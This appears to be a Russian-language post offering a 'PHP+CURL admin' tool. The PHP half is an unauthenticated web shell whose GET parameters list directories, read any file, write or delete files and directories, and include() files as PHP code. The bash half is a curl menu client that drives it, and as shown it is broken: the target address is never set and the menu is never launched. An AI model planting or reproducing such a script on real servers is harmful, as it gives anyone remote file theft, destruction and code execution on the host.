
PHP+CURL ADMIN

Полезный минимум для того, чтобы можно было загружать скрипты.

Серверная часть

<?php
// Server-side half of the tool: a series of independent GET-parameter
// handlers, each of which hands the raw parameter value to a filesystem
// function or to include(). Nothing in this listing authenticates the caller,
// confines paths to a base directory, or encodes the values it echoes back.
// Every action is selected by its query-string key (ls, cat, echo>, file_name,
// mkdir, rm, rmdir, inc), so requests to this script are normally visible by
// those keys in web server access logs.

// ls: print the entries of the directory named by the parameter.
if(isset($_GET['ls'])){
    // The banner prints DOCUMENT_ROOT, but scandir() below receives the
    // parameter as supplied; the two are not joined.
    echo 'ls '.$_SERVER['DOCUMENT_ROOT'].'/ '.$_GET['ls']."\n";
    $array = scandir($_GET['ls']);
    foreach($array as $value){
        echo $value."\n";
    }
}
// cat: print the contents of the file named by the parameter.
if(isset($_GET['cat'])){
    echo 'cat '.$_SERVER['DOCUMENT_ROOT'].'/ '.$_GET['cat']."\n";
    print(file_get_contents($_GET['cat'])."\n");
}
// echo>: write the parameter value into the file named by file_name.
if(isset($_GET['echo>'])){
    echo 'echo > '.$_SERVER['DOCUMENT_ROOT'].'/ '.$_GET['echo>']."\n";
    // Mode 'w' creates the file or truncates an existing one. file_name is
    // read without an isset() check and the fopen() result is not tested.
    $file_open = fopen($_GET['file_name'], 'w');
    fwrite($file_open,$_GET['echo>']);
    fclose($file_open);
}
// mkdir: create the named directory.
if(isset($_GET['mkdir'])){
    // 0777 requests world-writable permissions (the process umask still
    // applies); the third argument creates missing parent directories.
    mkdir($_GET['mkdir'],0777,true);
}
// rm: delete the named file if it exists and report the outcome.
if(isset($_GET['rm'])){
    echo 'rm '.$_SERVER['DOCUMENT_ROOT'].'/ '.$_GET['rm']."\n";
    $file_remove = $_GET['rm'];
    if(file_exists($file_remove)){
         unlink($file_remove);
         echo 'file deleted'."\n";
    }else{
         echo 'file not found'."\n";
    }
}
// rmdir: recursively delete the named directory.
if(isset($_GET['rmdir'])){
    echo 'rmdir '.$_SERVER['DOCUMENT_ROOT'].'/ '.$_GET['rmdir']."\n";
    // Declared inside the branch, so the function only exists on requests
    // that carry the rmdir parameter.
    function removeDirectory($rmdir){
        // Walk the glob matches: recurse into sub-directories, unlink files.
        // NOTE(review): a "/*" glob pattern normally skips dot-files, in which
        // case the final rmdir() on a directory containing them would fail -
        // confirm.
        if ($objs = glob($rmdir."/*")){
            foreach($objs as $obj){is_dir($obj) ? removeDirectory($obj) : unlink($obj);}
        }
        rmdir($rmdir);
    }
    removeDirectory($_GET['rmdir']);
}
// inc: include() evaluates the named file as PHP, which makes this handler
// the code-execution path of the script.
if(isset($_GET['inc'])){
    echo 'inc '.$_SERVER['DOCUMENT_ROOT'].'/ '.$_GET['inc']."\n";
    include($_GET['inc']);
}
?>

Консольная часть

#!/bin/bash

# FUNCTIONS
# Print the action menu, read one choice from stdin and dispatch to the
# matching handler, then show the menu again.
# Globals: address (read) - base URL of the server-side script; it is not
#          assigned anywhere in this listing.
gotoMenu(){
    echo '[ url:' $address ' ]'
    echo
    echo "1 - show directory"
    echo "2 - show file content"
    echo "3 - make directory"
    echo "4 - make file"
    echo "5 - remove directory"
    echo "6 - remove file"
    echo "7 - include file"
    echo
    echo "0 - get query"
    read choice
    clear
    # Input that matches no arm falls through and the menu is redrawn.
    case "$choice" in
        1 ) showDirectory;;
        2 ) showFile;;
        3 ) makeDirectory;;
        4 ) makeFile;;
        5 ) removeDirectory;;
        6 ) removeFile;;
        7 ) includeFile;;
        0 ) getQuery;;
    esac
    # Re-enters itself rather than looping, so the shell call stack grows by
    # one frame per menu round.
    gotoMenu
}
# Prompt for a directory name and request "<address>?ls=<name>", repeating
# until the literal input "exit" hands control back to the menu.
# Globals: address (read, expanded unquoted).
# The typed value is appended to the URL as-is; nothing here percent-encodes
# it. Being part of the query string, it is normally recorded in the target's
# access log.
showDirectory(){
    echo "directory name:"
    read ls_dir_name
    clear
    # gotoMenu itself recurses without returning, so this branch does not
    # come back to the curl call below.
    if [ "$ls_dir_name" = "exit" ];then gotoMenu;fi
    curl -G $address'?ls='"$ls_dir_name"
    echo
    showDirectory
}
# Prompt for a file name and request "<address>?cat=<name>", repeating until
# the literal input "exit" hands control back to the menu.
# Globals: address (read, expanded unquoted).
# The typed value is appended to the URL without percent-encoding.
showFile(){
    echo "file name:"
    read cat_file_name
    clear
    if [ "$cat_file_name" = "exit" ];then gotoMenu;fi
    curl -G $address'?cat='"$cat_file_name"
    echo
    # Self-call instead of a loop: prompts again after each response.
    showFile
}
# Prompt once for a directory name and request "<address>?mkdir=<name>".
# Returns to the caller afterwards (no "exit" handling, no repeat).
# Globals: address (read, expanded unquoted).
makeDirectory(){
    echo "directory name:"
    read mkdir_dir_name
    clear
    curl -G $address'?mkdir='"$mkdir_dir_name"
    echo
}
# Prompt for a file name and a single line of content, then request
# "<address>?file_name=<name>&echo=<content>".
# Globals: address (read, expanded unquoted).
# Both values travel in the query string without percent-encoding, so the
# file content is normally recorded in the target's access log together with
# the path.
makeFile(){
    echo "file name:"
    read echo_file_name
    clear
    echo "file content:"
    # read takes one line only; multi-line content cannot be entered here.
    read echo_file_content
    clear
    curl -G $address'?file_name='"$echo_file_name"'&echo='"$echo_file_content"
    echo
}
# Prompt once for a directory name and request "<address>?rmdir=<name>".
# There is no confirmation step before the request is sent.
# Globals: address (read, expanded unquoted).
removeDirectory(){
    echo "directory name:"
    read rmdir_dir_name
    clear
    curl -G $address'?rmdir='"$rmdir_dir_name"
    echo
}
# Prompt once for a file name and request "<address>?rm=<name>".
# There is no confirmation step before the request is sent.
# Globals: address (read, expanded unquoted).
removeFile(){
    echo "file name:"
    read rm_file_name
    clear
    curl -G $address'?rm='"$rm_file_name"
    echo
}
# Prompt once for a file name and request "<address>?inc=<name>"; in the
# server-side listing on this page that parameter is passed to include().
# Globals: address (read, expanded unquoted).
includeFile(){
    echo "file name:"
    read inc_file_name
    clear
    curl -G $address'?inc='"$inc_file_name"
    echo
}
# Read a raw query string from stdin (no prompt is printed) and request
# "<address>?<query>", repeating until the literal input "exit".
# Globals: address (read, expanded unquoted).
getQuery(){
    read get
    clear
    if [ "$get" = "exit" ];then gotoMenu;fi
    # $get is unquoted, so the shell word-splits and glob-expands the typed
    # text before curl receives it.
    curl -G $address'?'$get
    getQuery
}
# Read a line from stdin (no prompt is printed) and hand it to curl -d,
# repeating until the literal input "exit".
# Globals: address (read, expanded unquoted).
# No entry in gotoMenu's case statement dispatches to this function.
postQuery(){
    read post
    clear
    if [ "$post" = "exit" ];then gotoMenu;fi
    # As written, "$post" and $address are adjacent with no space between
    # them, so they are joined into the -d value rather than passed as a body
    # plus a separate URL argument.
    curl -d "$post"$address
    postQuery
}

# MAIN
# In the listing as shown, the main section only clears the terminal: it
# neither assigns address nor calls gotoMenu.
clear
